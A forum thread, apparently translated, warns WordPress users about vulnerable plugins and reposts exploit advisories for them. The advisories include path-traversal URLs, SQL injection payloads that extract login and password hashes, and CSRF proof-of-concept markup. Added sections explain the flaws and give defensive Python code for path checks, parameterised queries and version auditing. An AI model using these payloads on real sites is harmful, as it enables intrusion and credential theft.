
Topic: Important: Beware of these WordPress plugins

  1. Ahmadreza (responder and guide), member since Oct 2015
    Important: Beware of these WordPress plugins

    Hello
    Users and webmasters who use WordPress fortunately have acceptable security against hackers, thanks to version 3.7 onward!
    But there is always cause for concern, so try not to use the plugins listed below, or use their newer versions.
    WordPress Plugin Mac Photo Gallery 3.0 - Arbitrary File Download
    Code:
    # # # # # 
    # Exploit Title: WordPress Plugin Mac Photo Gallery v3.0 - Arbitrary File Download
    # Google Dork: N/A
    # Date: 09.03.2017
    # Vendor Homepage: https://www.apptha.com/
    # Software: https://www.apptha.com/category/exte...-Photo-Gallery
    # Demo: http://www.apptha.com/demo/mac-photo-gallery
    # Version: 3.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # Exploit :
    # http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php
    # Etc..
    # # # # #

    WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection
    Code:
    # # # # # 
    # Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - SQL Injection
    # Google Dork: N/A
    # Date: 09.03.2017
    # Vendor Homepage: https://www.apptha.com/
    # Software: https://www.apptha.com/category/exte...slider-gallery
    # Demo: http://www.apptha.com/demo/apptha-slider-gallery
    # Version: 1.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/?albid=[SQL]
    # For example;
    # -3+/*!50000union*/+select+1,2,3,4,5,0x496873616e2053656e63616e20207777772e696873616e2e6e6574,concat(user_login,0x3a,user_pass),8,9,10,11,12,13,14+from+pleasant_users--+-&pid=6
    # admin:$P$BKL0XND.tfopqZH6S.QU.vhgjuVchx1
    # Etc..
    # # # # #
    WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download
    Code:
    # # # # # 
    # Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - Arbitrary File Download
    # Google Dork: N/A
    # Date: 09.03.2017
    # Vendor Homepage: https://www.apptha.com/
    # Software: https://www.apptha.com/category/exte...slider-gallery
    # Demo: http://www.apptha.com/demo/apptha-slider-gallery
    # Version: 1.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # Exploit :
    # http://localhost/[PLUGIN_PATH]/asgallDownload.php?imgname=../../../wp-load.php
    # Etc..
    # # # # #
    WordPress Plugin PICA Photo Gallery 1.0 - SQL Injection
    Code:
    # # # # # 
    # Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection
    # Google Dork: N/A
    # Date: 09.03.2017
    # Vendor Homepage: https://www.apptha.com/
    # Software: https://www.apptha.com/category/exte...-Photo-Gallery
    # Demo: http://www.apptha.com/demo/pica-photo-gallery
    # Version: 1.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/?aid=[SQL]
    # For example;
    # -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+-
    # wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users
    # Etc..
    # # # # #
    WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery
    Code:
    ======
    Software: WordPress WHIZZ
    Version: <1.1.1
    Homepage: https://wordpress.org/plugins/whizz/
    =======
     
    Description
    ================
    GET-type CSRF in WordPress WHIZZ allows attackers to delete any WordPress user and change plugin status
     
    POC:
    ========
    Include the following in a page; when the page is loaded, the attack occurs:
     
    delete user:
     
    <img src="http://127.0.0.1/wordpress/wp-admin/...t_of=all_users">
     
     
    activate or deactivate plugins:
     
    <img src="http://127.0.0.1/wordpress/wp-admin/..._view&list_of=">
     
    <img src="http://127.0.0.1/wordpress/wp-admin/..._view&list_of=">
     
     
    Mitigations
    ================
    Disable the plugin until a new version is released that fixes this bug.
     
     
    FIX:
    ==========
    https://wordpress.org/plugins/whizz/ 1.1.1 changelog->Specifically



    #1 Posted on 06-18-2017 at 05:13 PM
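The two "Arbitrary File Download" entries above both come down to one mistake: a request parameter is joined onto a directory and served without checking where the resulting path ends up. The following is an added example (it is not from Ahmadreza's post and not the Apptha plugins' code) that models that handler in Python, with the vulnerable join beside a containment check. The directory layout is constructed in a temp dir; `gallery` is a hypothetical plugin directory name, and the three-level `../../../wp-load.php` climb is the same one the advisories use.

```python
import os
import shutil
import tempfile
from typing import Optional


def vulnerable_resolve(plugin_dir: str, user_param: str) -> str:
    """The pattern behind the two Arbitrary File Download entries: the
    request parameter is joined onto the plugin directory and served as-is."""
    return os.path.join(plugin_dir, user_param)


def safe_resolve(plugin_dir: str, user_param: str) -> Optional[str]:
    """Return an absolute path to a regular file inside plugin_dir, or None."""
    base = os.path.realpath(plugin_dir)
    # NUL bytes and absolute paths both defeat a naive join; refuse them early.
    if "\x00" in user_param or os.path.isabs(user_param):
        return None
    candidate = os.path.realpath(os.path.join(base, user_param))
    # realpath has already collapsed '..' and followed symlinks, so one
    # containment check on the resolved path covers both tricks.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def build_fixture():
    """Constructed stand-in for a WordPress tree (not a real install):
    <root>/wp-load.php and <root>/wp-content/plugins/gallery/photo1.jpg."""
    root = tempfile.mkdtemp(prefix="wpdemo_")
    plugin_dir = os.path.join(root, "wp-content", "plugins", "gallery")
    os.makedirs(plugin_dir)
    with open(os.path.join(root, "wp-load.php"), "w") as fh:
        fh.write("<?php /* constructed placeholder, not WordPress core */\n")
    with open(os.path.join(plugin_dir, "photo1.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8constructed-jpeg-bytes")
    return root, plugin_dir


def demo() -> dict:
    root, plugin_dir = build_fixture()
    # Same three-level climb as the advisories' ../../../wp-load.php:
    # gallery -> plugins -> wp-content -> root
    traversal = "../../../wp-load.php"
    legit = os.path.realpath(os.path.join(plugin_dir, "photo1.jpg"))
    results = {
        "vulnerable_serves_core_file": os.path.isfile(vulnerable_resolve(plugin_dir, traversal)),
        "safe_rejects_traversal": safe_resolve(plugin_dir, traversal) is None,
        "safe_rejects_absolute": safe_resolve(plugin_dir, os.path.join(root, "wp-load.php")) is None,
        "safe_allows_gallery_file": safe_resolve(plugin_dir, "photo1.jpg") == legit,
    }
    shutil.rmtree(root, ignore_errors=True)
    return results


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The check is on the resolved path, not on the input string: stripping `../` from the parameter is the usual wrong fix, because `....//` and encoded variants survive it, whereas `realpath` plus `commonpath` judges where the file actually is.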



  3. Ahmadreza
    WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery
    Code:
    <!--
    =======
    Software: CopySafe Web
    version: <2.6
    description: Add copy protection from PrintScreen and screen capture. Copysafe Web uses encrypted images and domain lock to extend copy protection for all media displayed on a web page.
    ========
     
    Description
    ==========
    CSRF in WordPress CopySafe Web allows an attacker to change plugin settings
     
    ========
     
    POC:
    =======
    -->
     
    <form method="POST" action="http://127.0.0.1/wordpress/wp-admin/...wpcsw_settings">
     
      <input type="text" name="admin_only" value="checked">
     
     <input type="text" name="asps" value="">
     <input type="text" name="upload_path" value="">
     <input type="text" name="max_size" value="">
     <input type="text" name="mode" value="checked">
     <input type="text" name="submit" value="Save Settings">
       <input type="submit">
    </form>
     
    <!--
     
    =========
    Mitigations
    ================
    Disable the plugin until a new version is released that fixes this bug.
     
    Fixed
    =========
    https://wordpress.org/plugins/wp-copysafe-web/ changelog -> 2.6 release
    -->
    WordPress Plugin WP Jobs < 1.5 - SQL Injection
    Code:
    # Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection
    # Date: 11-06-2017
    # Exploit Author: Dimitrios Tsagkarakis
    # Website: dtsa.eu 
    # Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/
    # Vendor Homepage: http://www.intensewp.com/
    # Version: 1.4
    # CVE : CVE-2017-9603
    # Category: webapps
     
      
     
    1. Description:
     
        
     
    SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress
    allows authenticated users to execute arbitrary SQL commands via the jobid
    parameter to wp-admin/edit.php. 
     
      
     
    2. Proof of Concept:
     
      
     
    http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment
     
      
     
    3. Solution:
     
        
     
    A new version of WP Jobs is available. Update the WordPress WP Jobs to the
    latest version.
     
      
     
    4. Reference:
     
      
     
    http://dtsa.eu/cve-2017-9603-wordpre...njection-sqli/
     
    http://www.cve.mitre.org/cgi-bin/cve...name=2017-9603

    WordPress Plugin Event List <= 0.7.8 - SQL Injection
    Code:
    # Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
    # Date: 04-06-2017
    # Exploit Author: Dimitrios Tsagkarakis
    # Website: dtsa.eu 
    # Software Link: https://wordpress.org/plugins/event-list/
    # Version: 0.7.8
    # CVE : CVE-2017-9429
    # Category: webapps
     
      
     
    1. Description:
     
        
     
    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php. 
     
      
     
    2. Proof of Concept:
     
      
     
    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)
     
      
     
    3. Solution:
     
        
     
    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.
     
      
     
    4. Reference:
     
      
     
    http://dtsa.eu/cve-2017-9429-event-l...based-sql-injection-sqli/
     
    http://www.cve.mitre.org/cgi-bin/cve...name=2017-9429
    WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection
    Code:
    # Exploit Title: WP-Testimonials < 3.4.1 Union Based SQL Injection
    # Date: 03-06-2017
    # Exploit Author: Dimitrios Tsagkarakis
    # Website: dtsa.eu 
    # Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/
    # Vendor Homepage: http://www.sunfrogservices.com/web-p...-testimonials/
    # Version: 3.4.1
    # CVE : CVE-2017-9418
     
    # Category: webapps
     
      
     
    1. Description:
     
        
     
    SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for
    WordPress allows an authenticated user to execute arbitrary SQL commands via
    the testid parameter to wp-admin/admin.php.
     
    2. Proof of Concept:
     
    http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedit&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL-- comment
     
    3. Solution:
     
        
     
    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.
     
      
     
    4. Reference:
     
    http://dtsa.eu/wp-testimonials-wordp...based-sql-injection-sqli/
     
    http://www.cve.mitre.org/cgi-bin/cve...name=2017-9418



    #2 Posted on 06-18-2017 at 05:14 PM
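The SQL injection entries in both posts (Apptha Slider Gallery and PICA Photo Gallery in the first, WP Jobs, Event List and WP-Testimonials in the second) share one root cause: an `id`-style request parameter is spliced into the statement text. The union payloads show the consequence, a negative id that matches nothing followed by a `UNION SELECT` with the same column count that pulls `user_login:user_pass` out through a text column; the Event List `AND SLEEP(10)` probe relies on the same splice. The following is an added example, not from either post and not any of these plugins' code, that reproduces the mechanism against a constructed in-memory SQLite database (the table names, rows and hash are placeholders, and the payload is rewritten in SQLite dialect, since `/*!50000union*/` and `concat()` are MySQL-specific) and shows the parameterised form that defeats it.

```python
import sqlite3

# Constructed schema and rows standing in for a gallery plugin table and
# WordPress's users table; the hash is a placeholder, not a real credential.
SCHEMA = """
CREATE TABLE albums (id INTEGER PRIMARY KEY, title TEXT, filename TEXT);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO albums VALUES (6, 'Holiday', 'holiday.jpg');
INSERT INTO wp_users VALUES (1, 'admin', '$P$Bconstructed.placeholder.hash');
"""

# Same shape as the posts' payloads, in SQLite dialect: an id that matches
# no row, a UNION with the original SELECT's column count, and the
# login:hash pair smuggled out through one of the text columns.
PAYLOAD = "-3 UNION SELECT 1, user_login || ':' || user_pass, 3 FROM wp_users -- -"


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, albid) -> list:
    """The bug class behind every SQLi entry above: the request parameter is
    spliced into the statement text, so it can rewrite the statement."""
    sql = f"SELECT id, title, filename FROM albums WHERE id = {albid}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, albid) -> list:
    """Bound parameter: the value travels separately from the statement and
    can never change its structure, whatever it contains."""
    sql = "SELECT id, title, filename FROM albums WHERE id = ?"
    return conn.execute(sql, (albid,)).fetchall()


def safe_lookup_int(conn: sqlite3.Connection, albid) -> list:
    """Belt and braces: coerce to int first (what WordPress's absint() does
    for ids), then still bind it."""
    try:
        ident = int(albid)
    except (TypeError, ValueError):
        return []
    return safe_lookup(conn, ident)


def demo() -> dict:
    conn = open_db()
    try:
        leaked = vulnerable_lookup(conn, PAYLOAD)
        return {
            "vulnerable_leaks_credential": any("admin:" in str(row[1]) for row in leaked),
            "safe_returns_nothing": safe_lookup(conn, PAYLOAD) == [],
            "safe_int_returns_nothing": safe_lookup_int(conn, PAYLOAD) == [],
            "legit_request_still_works": safe_lookup_int(conn, "6") == [(6, "Holiday", "holiday.jpg")],
        }
    finally:
        conn.close()


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

In a real plugin the equivalent of `safe_lookup` is `$wpdb->prepare()` with `%d`/`%s` placeholders; the point the example makes is that the fix is structural (binding), not a blacklist of keywords such as `union`, which the `/*!50000union*/` form in the first post exists to slip past.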
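Both posts end with the same advice: check which of these plugins and versions you run, then remove or update them. The following is an added example, not from the posts, that turns the affected ranges stated on this page into an audit script. It reads the `Plugin Name:` and `Version:` keys from each plugin's main-file header (the two keys WordPress itself reads) and compares against the table. Assumptions: the `Plugin Name` values are taken from the advisory titles and may not match the real headers exactly; for the three Apptha plugins the posts name only the tested version and no fixed release, so the table flags that version or older; the sample headers at the bottom are constructed, not copied from the real plugins.

```python
import os
import re
from typing import Dict, Optional, Tuple

# Affected ranges as the two posts state them.  Apptha entries: only the
# tested version is confirmed and no fix is named, so "<=" is an assumption.
VULNERABLE = {
    "Mac Photo Gallery": ("<=", "3.0"),
    "Apptha Slider Gallery": ("<=", "1.0"),
    "PICA Photo Gallery": ("<=", "1.0"),
    "WHIZZ": ("<", "1.1.1"),
    "CopySafe Web": ("<", "2.6"),
    "WP Jobs": ("<", "1.5"),
    "Event List": ("<=", "0.7.8"),
    "WP-Testimonials": ("<=", "3.4.1"),
}

# Matches "Plugin Name: X" / "Version: X" lines, tolerating the "/*", " * "
# and "#" decorations that header comment blocks carry.
HEADER_RE = re.compile(r"^[ \t/*#@]*(Plugin Name|Version):[ \t]*(.+?)[ \t]*$", re.M)


def parse_header(text: str) -> Dict[str, str]:
    """Pull the two header keys out of a plugin main file's leading comment."""
    return {key: value for key, value in HEADER_RE.findall(text)}


def version_tuple(version: str) -> Tuple[int, ...]:
    # Numeric dotted versions only; a suffix such as "-beta" is dropped.
    return tuple(int(n) for n in re.findall(r"\d+", version.split("-")[0]))


def is_affected(name: str, version: str) -> Optional[bool]:
    """True if the page lists name/version as vulnerable, False if the plugin
    is listed but the version is newer, None if the name is not on the list."""
    rule = VULNERABLE.get(name)
    if rule is None:
        return None
    op, bound = rule
    have, limit = version_tuple(version), version_tuple(bound)
    width = max(len(have), len(limit))          # pad so 1.1 == 1.1.0
    have += (0,) * (width - len(have))
    limit += (0,) * (width - len(limit))
    return have < limit if op == "<" else have <= limit


def audit(plugin_files: Dict[str, str]) -> Dict[str, Optional[bool]]:
    """Map each main-file path to a verdict; files without a usable header
    or with a name not on the list get None so they are not silently passed."""
    verdicts: Dict[str, Optional[bool]] = {}
    for path, text in plugin_files.items():
        header = parse_header(text)
        if "Plugin Name" not in header or "Version" not in header:
            verdicts[path] = None
            continue
        verdicts[path] = is_affected(header["Plugin Name"], header["Version"])
    return verdicts


def scan_plugins_dir(plugins_dir: str) -> Dict[str, str]:
    """Collect the first 8 KiB of every top-level .php file in each plugin
    directory (WordPress also only inspects the head of the file)."""
    found: Dict[str, str] = {}
    for slug in sorted(os.listdir(plugins_dir)):
        sub = os.path.join(plugins_dir, slug)
        if not os.path.isdir(sub):
            continue
        for entry in sorted(os.listdir(sub)):
            if entry.endswith(".php"):
                with open(os.path.join(sub, entry), "r", errors="replace") as fh:
                    found[f"{slug}/{entry}"] = fh.read(8192)
    return found


# Constructed headers for a self-contained run; not copied from real plugins.
SAMPLE_PLUGINS = {
    "wp-jobs/wp-jobs.php": "<?php\n/*\nPlugin Name: WP Jobs\nVersion: 1.4\n*/\n",
    "event-list/event-list.php": "<?php\n/**\n * Plugin Name: Event List\n * Version: 0.7.9\n */\n",
    "whizz/whizz.php": "<?php\n/*\nPlugin Name: WHIZZ\nVersion: 1.1.1\n*/\n",
    "wp-copysafe-web/wp-copysafe-web.php": "<?php\n/*\nPlugin Name: CopySafe Web\nVersion: 2.5\n*/\n",
    "akismet/akismet.php": "<?php\n/*\nPlugin Name: Akismet\nVersion: 3.3\n*/\n",
}

if __name__ == "__main__":
    import sys
    files = scan_plugins_dir(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_PLUGINS
    for path, verdict in audit(files).items():
        label = {True: "VULNERABLE", False: "ok", None: "not on list"}[verdict]
        print(f"{label:12} {path}")
```

Run it as `python audit.py /var/www/html/wp-content/plugins` against a real install, or with no argument to see the constructed sample. A `None` verdict is deliberately not "ok": a plugin whose header could not be parsed, or whose name differs from the advisory title, still needs a manual look.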
